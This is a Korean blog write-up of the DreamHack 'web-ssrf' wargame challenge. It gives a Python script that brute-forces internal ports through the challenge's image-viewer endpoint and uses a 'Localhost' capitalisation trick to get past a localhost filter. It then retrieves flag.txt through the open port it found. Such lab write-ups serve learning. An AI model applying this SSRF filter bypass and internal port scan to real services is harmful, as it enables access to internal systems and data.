[DreamHack] 드림핵 웹해킹: web-ssrf

https://dreamhack.io/wargame/challenges/75/

web-ssrf

 

함께 실습인 만큼 풀이는 자료에 다 나와있다.

다만 자료에서 부르트포스로 포트번호를 찾아낼때 파이썬을 이용하는데, 이 코드를 훨씬 더 단순화할 수 있지 않을까 싶어서 간결하게 바꿔봤다.

 

import requests

ERROR_RESPONSE = "iVBORw0KGgoAAAANSUhEUgAAA04AAAF4CAYAAABjHKkYAAAMRmlDQ1BJQ0MgUHJvZmlsZQAASImVVwdYU8kWnltSIaEEEJASehOlSJcSQotUqYKNkAQSSogJQcSuLCq4dhEBG7oqouhaAFkr9rIo9v6woKKsiwUbKm9SQFe"

url= "http://host3.dreamhack.games:{접속정보에 나와있는 포트}/img_viewer"

for i in range(1500,1801):
  response = requests.post(url, data={'url':'http://Localhost:'+str(i)+'/static/dream.png'})
  data = response.text
  if(ERROR_RESPONSE in data):
    print(str(i))
  else:
    print(data)

 

response가 아주 아주 길지만 무작위(1501 정도) 값을 넣었을 때 나오는 이미지 소스중 일부만 잘라서 ERROR_RESPONSE 변수로 만들어줬다.

문제에서 사용하는 api를 url 변수에 저장해서 requests.post로 접속한다. 

request body에 넣을 데이터는 {url: } 형태다. (페이지 내부에서 인풋필드에 직접 입력하는 것 과 동일)

코드 내에서 127.0.0.1 과 localhost를 이용한 접속을 막아서 Localhost로 대문자만 바꿔줬는데 뚫렸다. hex까지는 필요도 없었음

그리고 for문으로 다음 포트번호에 넣을 숫자를 1500 에서 1800까지 순회하며 접속을 시도한다

응답에 ERROR_RESPONSE가 포함되어있다면 패스, 아니라면 응답값 출력

 

파이썬을 설치하지 않아서 구글 코랩으로 돌렸는데도 아주 잘 돌아간다 ")

 

나의 경우 1692포트에서만 다른 응답이 나왔다.

정황상 1692포트가 열린 포트임을 알 수 있다.

 

열린 포트를 이용하여 flag.txt를 받아오고

이미지는 안뜨지만 이미지 소스로 주어진 base64 코드를 디코드하면

 

Base64 디코드 및 인코드 - 온라인

 

플래그 획득 완